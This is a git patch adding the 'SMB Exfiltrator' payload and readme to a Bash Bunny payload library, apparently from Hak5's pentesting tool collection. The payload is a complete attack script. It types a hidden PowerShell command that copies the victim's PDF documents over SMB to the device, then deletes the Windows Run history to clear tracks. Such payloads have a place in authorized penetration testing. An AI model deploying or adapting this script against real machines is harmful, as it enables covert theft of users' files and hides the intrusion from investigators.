From 42819e4e6b519e53247cae1c33f05acaf8006560 Mon Sep 17 00:00:00 2001
From: Darren Kitchen <darren@hak5.org>
Date: Tue, 21 Mar 2017 14:12:41 +0700
Subject: [PATCH] Add SMB Exfiltrator Payload

This is an awesome payload check out Hak5 episode 2202
---
 payloads/library/smb_exfiltrator/payload.txt | 115 +++++++++++++++++++
 payloads/library/smb_exfiltrator/readme.md   |  28 +++++
 2 files changed, 143 insertions(+)
 create mode 100644 payloads/library/smb_exfiltrator/payload.txt
 create mode 100644 payloads/library/smb_exfiltrator/readme.md

diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt
new file mode 100644
index 00000000..06310fa0
--- /dev/null
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -0,0 +1,115 @@
+#!/bin/bash
+#
+# Title:         SMB Exfiltrator
+# Author:        Hak5Darren
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        Windows XP SP3+ (Powershell)
+# Attackmodes:   HID, Ethernet
+# 
+# 
+# Red Blink Fast.......Impacket not found
+# Red Blink Slow.......Target did not acquire IP address
+# Amber Blink Fast.....Initialization
+# Amber................HID Stage
+# Purple Blink Fast....Ethernet Stage
+# Blue Interstitial....Receiving Files
+# White................Moving loot to mass storage
+# Green................Finished
+#
+# OPTIONS
+LOOTDIR=/root/udisk/loot/smb_exfiltrator
+EXFILTRATE_FILES="*.pdf"
+CLEARTRACKS="yes" # yes or no
+
+# Initialization
+LED R G 100
+
+
+# Check for impacket. If not found, blink fast red.
+if [ ! -d /pentest/impacket/ ]; then
+  LED R 100
+  exit 1
+fi
+
+
+# HID STAGE
+# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
+# Once found, initiates file copy and exits
+LED R G
+ATTACKMODE HID
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK ENTER
+
+# Clear tracks?
+if [ $CLEARTRACKS == "yes" ]; then
+   QUACK DELAY 500
+   QUACK GUI r
+   QUACK DELAY 500
+   QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+   QUACK ENTER
+fi
+
+
+# ETHERNET STAGE
+LED R B 100
+ATTACKMODE RNDIS_ETHERNET
+
+
+# Setup SMB server to receive loot in staging area
+mkdir -p /root/loot/smb_exfiltrator/temp/
+# house cleaning
+rm -rf /root/loot/smb_exfiltrator/temp/*
+# Fire up SMB Server
+/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &
+
+
+# Source bunny_helpers.sh to get environment variables
+source bunny_helpers.sh
+
+
+# Give target a chance to start exfiltration
+sleep 2
+
+
+# Make loot directory based on hostname (increment for multiple uses)
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+# If hostname is blank set it to "noname"
+[[ -z "$HOST" ]] && HOST="noname"
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+
+
+# Check target IP address. If unset, blink slow red.
+if [ -z "${TARGET_IP}" ]; then
+    LED R 1000
+	exit 1
+fi
+
+
+# Wait until exfiltration is complete
+last=0
+current=1
+while [ "$last" != "$current" ]; do
+   last=$current
+   current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
+   LED B
+   sleep 1
+   LED R B 100
+   sleep 9
+   # Files are still being copied. Loop. 
+   # (Issue may exist if file takes longer than 10s to copy)
+done
+
+
+# Move files from staging area to loot directory
+LED R G B
+mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
+sync; sleep 1; sync
+
+# Trap is clean
+LED G
diff --git a/payloads/library/smb_exfiltrator/readme.md b/payloads/library/smb_exfiltrator/readme.md
new file mode 100644
index 00000000..dc0fbbb0
--- /dev/null
+++ b/payloads/library/smb_exfiltrator/readme.md
@@ -0,0 +1,28 @@
+# SMB Exfiltrator
+
+* Author: Hak5Darren
+* Version: Version 1.0
+* Target: Windows XP SP3+ (Powershell)
+* Category: Exfiltration
+* Attackmodes: HID, Ethernet
+
+## Description
+
+Exfiltrates select files from users's documents folder via SMB.
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-#
+
+## Configuration
+
+Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired. 
+
+## STATUS
+
+| LED                 | Status                                 |
+| ------------------- | -------------------------------------- |
+| Red (fast blink)    | Impacket not found in /pentest         |
+| Red (slow blink)    | Setup Failed. Target didn't obtain IP  |
+| Amber               | Initialization                         |
+| Purple (fast blink) | Switching to Mass Storage (optional)   |
+| Blue (interupt)     | Receiving files                        |
+| White               | Files received, moving to mass storage |
+| Green               | Finished                               |